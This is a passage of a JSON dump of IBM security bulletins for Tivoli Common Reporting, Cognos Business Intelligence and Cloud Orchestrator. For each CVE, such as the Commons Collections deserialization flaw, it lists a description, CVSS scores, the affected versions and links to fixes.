exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/95328>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n**CVEID: **[_CVE-2014-3577_](<https://vulners.com/cve/CVE-2014-3577>)** \nDESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/95327>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n** \nCVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n** \nCVEID: **[_CVE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>)** \nDESCRIPTION:** An invalid (too short) RSA key might be accepted under certain circumstances. The fix ensures that invalid RSA keys are rejected correctly. This issue affects Java deployments which use SSL/TLS communication and/or the java.security.cert.CertPath API. \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_h_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>)[_ttps://exchange.xforce.ibmcloud.com/vulnerabilities/107361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n## Affected Products and Versions\n\nTivoli Common Reporting 2.1 \n\nTivoli Common Reporting 2.1.1\n\nTivoli Common Reporting 2.1.1.2\n\nTivoli Common Reporting 3.1\n\nTivoli Common Reporting 3.1.0.1\n\nTivoli Common Reporting 3.1.0.2\n\nTivoli Common Reporting 3.1.2\n\nTivoli Common Reporting 3.1.2.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for versions listed as soon as practical. \n \n \n\n\n**Tivoli Common reporting release**| **Remediation ** \n---|--- \n2.1| [Install Interim Fix 14](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.0.0&platform=All&function=all>) \n2.1.1| [Install Interim Fix 22](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.1.0&platform=All&function=all>) \n2.1.1.2| [Install Interim Fix 9](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+Tivoli+Common+Reporting&release=2.1.1.2&platform=All&function=all>) \n3.1.0.0 through 3.1.2| [Download 10.2-BA-CBI-<OS>64-IF0016](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Cognos&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=10.2&platform=All&function=all>) \n[Install 10.2-BA-CBI-<OS>64-IF0016](<http://www-01.ibm.com/support/docview.wss?uid=swg21967299>) \n3.1.2.1| [Download 10.2.1.1-BA-CBI-<OS>64-IF0012](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Cognos&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=10.2.1.1&platform=All&function=all>) \n[Install 10.2.1.1-BA-CBI-<OS>64-IF0012](<http://www-01.ibm.com/support/docview.wss?uid=swg21967299>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:14:17", "type": "ibm", "title": "Security Bulletin: Multiple vulnerability in Product IBM Tivoli Common Reporting (CVE-2015-7436,CVE-2015-7435,CVE-2012-6153,CVE-2014-3577,CVE-2015-7450,CVE-2015-4872)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6153", "CVE-2014-3577", "CVE-2015-4872", "CVE-2015-7435", "CVE-2015-7436", "CVE-2015-7450"], "modified": "2018-06-17T15:14:17", "id": "F6932FFA729B316CDBF1B06D2938B9D53FBCB3E73735DBB2B0ECB271EC493B76", "href": "https://www.ibm.com/support/pages/node/274387", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:30", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 6 and IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7 that are used by IBM Cognos Business Intelligence. These issues were disclosed as part of the IBM Java SDK updates in October 2015. \n \nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cognos Business Intelligence. \n \nAdd/remove users to/from an external (namespace) group could leave them with old permissions. \n \nBackURL prefixed with white-space skips CAF validation. \n \nA security vulnerability has been discovered in the Open Source Apache HttpComponents. \n\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2015-7436_](<https://vulners.com/cve/CVE-2015-7436>)** \nDESCRIPTION:** Add/remove users to/from an external (namespace) group could leave them with old permissions. \nCVSS Base Score: 2.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107961> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID: **[_CVE-2015-7435_](<https://vulners.com/cve/CVE-2015-7435>)** \nDESCRIPTION:** BackURL prefixed with white-space skips CAF validation. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107960> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID: **[_CVE-__2012-6153_](<https://vulners.com/cve/CVE-2012-6153>)\n\n \n**DESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by an incomplete fix related to the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95328> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n**CVEID: **[_CVE-2014-3577_](<https://vulners.com/cve/CVE-2014-3577>)\n\n \n**DESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95327> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n \n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[_C__VE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>) \n**DESCRIPTION:** An invalid (too short) RSA key might be accepted under certain circumstances. The fix ensures that invalid RSA keys are rejected correctly. This issue affects Java deployments which use SSL/TLS communication and/or the java.security.cert.CertPath API. \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [h](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>)[ttps://exchange.xforce.ibmcloud.com/vulnerabilities/107361](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n## Affected Products and Versions\n\n * * IBM Cognos Business Intelligence Server 10.2.2\n * IBM Cognos Business Intelligence Server 10.2.1.1\n * IBM Cognos Business Intelligence Server 10.2.1\n * IBM Cognos Business Intelligence Server 10.2\n * IBM Cognos Business Intelligence Server 10.1.1\n * IBM Cognos Business Intelligence Server 10.1\n * IBM Cognos Business Intelligence Server 8.4.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for versions listed as soon as practical. \n \n8.4.1: [](<http://www.ibm.com/support/docview.wss?uid=swg24041190>)<http://www.ibm.com/support/docview.wss?uid=swg24041190> \n10.1.x: <http://www.ibm.com/support/docview.wss?uid=swg24041201> \n10.2.x: <http://www.ibm.com/support/docview.wss?uid=swg24041199>\n\n## Workarounds and Mitigations\n\nNone known. Apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T23:13:48", "type": "ibm", "title": "Security Bulletin: IBM Cognos Business Intelligence Server 2015Q4 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities. CVE-2015-7436,CVE-2015-7435,CVE-2012-6153,CVE-2014-3577,CVE-2015-7450,CVE-2015-4872", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6153", "CVE-2014-3577", "CVE-2015-4872", "CVE-2015-7435", "CVE-2015-7436", "CVE-2015-7450"], "modified": "2018-06-15T23:13:48", "id": "33FF9BBFA013E40A06E5B0AB55B876DFB2EA6711862322A00D2EC4A4BC79A5F7", "href": "https://www.ibm.com/support/pages/node/529355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:49", "description": "## Summary\n\nIBM SmartCloud Cost Management is shipped as a component of IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise. Information about security vulnerabilities affecting IBM SmartCloud Cost Management has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletins for IBM SmartCloud Cost Management for vulnerability details and information about fixes. \n\n\n * [Security Bulletin: HTTP response splitting has been identified in IBM WebSphere Application Server Liberty Profile shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg2C1000121>)\n * [Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Cost Management and Tivoli Usage Accounting Manager (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg2C1000003>) \n\n * * [Security Bulletin: A security vulnerability has been found in IBM WebSphere Application Server 8.5.5.6 shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21964651>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management. (CVE-2015-1932)](<http://www.ibm.com/support/docview.wss?uid=swg21965064>) \n \n\n * [Security Bulletin: A security vulnerability has been found in IBM WebSphere Application Server 8.5.5.6 shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-1885)](<http://www.ibm.com/support/docview.wss?uid=swg21964504>)** \n \n**\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21964499>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Tivoli Usage and Accounting Manager/SmartCloud Cost Management. (CVE-2015-4938)](<http://www.ibm.com/support/docview.wss?uid=swg21964864>) \n \n\n * [Security Bulletin: Security vulnerabilities have been identified in IBM\u00ae DB2\u00ae shipped with SmartCloud Cost Management (SCCM/TUAM) (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21675921>) \n \n\n * [Security Bulletin: Tivoli Usage and Accounting Manager / SmartCloud Cost Management (CVE-2015-1920) ](<http://www.ibm.com/support/docview.wss?uid=swg21957821>) \n \n\n * [Security Bulletin: Vulnerability in RC4 stream cipher affects Tivoli usage and Accounting Manager / SmartCloud Cost Management (CVE-2015-2808, CVE-2015-0138 )](<http://www.ibm.com/support/docview.wss?uid=swg21883107>)\n\n## Affected Products and Versions\n\n** Principal Product and Version**\n\n| ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator Enterprise 2.5, 2.5.0.1| IBM SmartCloud Cost Management 2.1.0.5 \nIBM Cloud Orchestrator Enterprise 2.4 and 2.4.0.1, 2.4.0.2, 2.4.0.3| IBM SmartCloud Cost Management 2.1.0.4 \nIBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1| IBM SmartCloud Cost Management 2.1.0.3 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6747", "CVE-2014-0963", "CVE-2015-0138", "CVE-2015-1885", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1932", "CVE-2015-2017", "CVE-2015-2808", "CVE-2015-4000", "CVE-2015-4938", "CVE-2015-7450"], "modified": "2018-06-17T22:30:51", "id": "705280D237DEDB26D3D68396BC2097819ADC8127D93D08AF8CFC027E9A703179", "href": "https://www.ibm.com/support/pages/node/262093", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:09", "description": "## Summary\n\nMultiple vulnerabilities have been identified in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and in supporting products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nThis security bulletin covers multiple vulnerabilities in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and supporting products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. It addresses other vulnerabilities including the IBM SDK, Java Technology Edition October 2015. This security bulletin covers also the Logjam Attack on TLS connections using the Diffie-Hellman (DH) key exchange protocol vulnerability. \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n\n**CVEID:** [_CVE-2015-4872_](<https://vulners.com/cve/CVE-2015-4872>)** \nDESCRIPTION:** An unspecified vulnerability related to the Security component has no confidentiality impact, partial integrity impact, and no availability impact. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n**CVEID:** [_CVE-2015-4734_](<https://vulners.com/cve/CVE-2015-4734>)** \nDESCRIPTION:** An unspecified vulnerability related to the JGSS component could allow a remote attacker to obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107356_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107356>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n**CVEID:** [_CVE-2015-5006_](<https://vulners.com/cve/CVE-2015-5006>)** \nDESCRIPTION:** IBM Java Security Components could allow an attacker with physical access to the system to obtain sensitive information from the Kerberos Credential Cache. \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106309_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106309>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [_CVE-2015-4947_](<https://vulners.com/cve/CVE-2015-4947>) \n**DESCRIPTION:** IBM HTTP Server Administration Server could be vulnerable to a stack buffer overflow, caused by improper handling of user input. An authenticated remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/104912_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/104912>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2015-4938_](<https://vulners.com/cve/CVE-2015-4938>) \n**DESCRIPTION:** IBM WebSphere Application Server could allow a remote attacker to spoof a servlet. An attacker could exploit this vulnerability to persuade the user into entering sensitive information. \nCVSS Base Score: 3.5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/104415>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-4000_](<https://vulners.com/cve/CVE-2015-4000>)** \nDESCRIPTION:** The TLS protocol could allow a remote attacker to obtain sensitive information, caused by the failure to properly convey a DHE_EXPORT cipher suite choice. An attacker could exploit this vulnerability using man-in-the-middle techniques to force a downgrade to 512-bit export-grade cipher. Successful exploitation could allow an attacker to recover the session key as well as modify the contents of the traffic. This vulnerability is commonly referred to as \"Logjam\". \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103294_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103294>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2015-3183_](<https://vulners.com/cve/CVE-2015-3183>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to HTTP request smuggling, caused by a chunk header parsing flaw in the apr_brigade_flatten() function. By sending a specially-crafted request in a malformed chunked header to the Apache HTTP server, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/104844_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/104844>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [_CVE-2015-2017_](<https://vulners.com/cve/CVE-2015-2017>) \n**DESCRIPTION:** IBM WebSphere Application Server is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/103991>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-1932_](<https://vulners.com/cve/CVE-2015-1932>) ** \nDESCRIPTION:** IBM WebSphere Application Server and IBM WebSphere Virtual Enterprise could allow a remote attacker to obtain information that identifies the proxy server software being used. \nCVSS Base Score: 5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/102970>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID**: [_CVE-2015-3646_](<https://vulners.com/cve/CVE-2015-3646>) \nDescription: OpenStack Keystone could allow a remote attacker to obtain sensitive information, caused by the logging of the backend argument configuration option content. An attacker with read access could exploit this vulnerability to obtain sensitive information about specific backends. \nCVSS Base Score: 4.300 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/102922_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/102922>) for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2015-1788_](<https://vulners.com/cve/CVE-2015-1788>) \n**DESCRIPTION:** OpenSSL is vulnerable to a denial of service, caused by an error when processing an ECParameters structure over a specially crafted binary polynomial field. A remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103778_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103778>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\n**Affected Principal Product and Versions**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.4, 2.4.0.1 and 2.4.0.2 and 2.4.0.2 Interim Fix1| IBM Business Process Manager Standard 8.5.0.1 \nIBM HTTP Server 8.5.5 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Tivoli System Automation for Multiplatforms 4.1 \nIBM Endpoint Manager for Patch Management 9.1 \nIBM DB2 Enterprise Server Edition 10.5.0.2 \nIBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1, 2.4.0.2 and 2.4.0.2 Interim Fix1 | IBM Business Process Manager Standard 8.5.0.1 \nIBM HTTP Server 8.5.5 \nIBM Tivoli System Automation Application Manager 4.1 \nIBM Tivoli System Automation for Multiplatforms 4.1 \nIBM Endpoint Manager for Patch Management 9.1 \nIBM DB2 Enterprise Server Edition 10.5.0.2 \nIBM SmartCloud Cost Management 2.1.0.4 \nIBM Tivoli Monitoring 6.3.0.2 \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fixes as soon as practical. Please see below for information on the fixes available. \n \nIf you are running IBM Cloud Orchestrator 2.4, 2.4.0.1 or 2.4.0.2, 2.4.0.2 Interim Fix1** **upgrade to [**IBM Cloud Orchestrator 2.4 Fix Pack 3**** (2.4.0.3)**](<http://www.ibm.com/support/docview.wss?uid=swg24040281>). \n\n \nFor affected supporting products shipped with IBM Cloud Orchestrator consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager \n| 8.5.0.1 \n \n| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM Tivoli System Automation for Multiplatforms| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation for Multiplatforms shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882549>) \nIBM DB2 Enterprise Server Edition| 10.5.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM DB2 Enterprise Server Edition shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882724>) \nIBM Endpoint Manager for Patch Management| 9.1| [_Security Bulletin: Multiple vulnerabilities in IBM Endpoint Manager for Patch Management shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882824>) \n \n \nIf you are running IBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1 or 2.4.0.2, 2.4.0.2 Interim Fix1 upgrade to** ****IBM Cloud Orchestrator Enterprise 2.4 Fix Pack 3 (2.4.0.3)**\n\n \nFor affected supporting products shipped with IBM Cloud Orchestrator Enterprise, consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n \n \n \n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager| 8.5.0.1| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM Tivoli System Automation for Multiplatforms| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation for Multiplatforms shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882549>) \nIBM Endpoint Manager for Patch Management| 9.1| [_Security Bulletin: Multiple vulnerabilities in IBM Endpoint Manager for Patch Management shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882824>) \nIBM DB2 Enterprise Server Edition| 10.5.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM DB2 Enterprise Server Edition shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator_](<http://www.ibm.com/support/docview.wss?uid=swg21882724>) \nIBM SmartCloud Cost Management| 2.1.0.4| [_Security Bulletin: A security vulnerability in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud 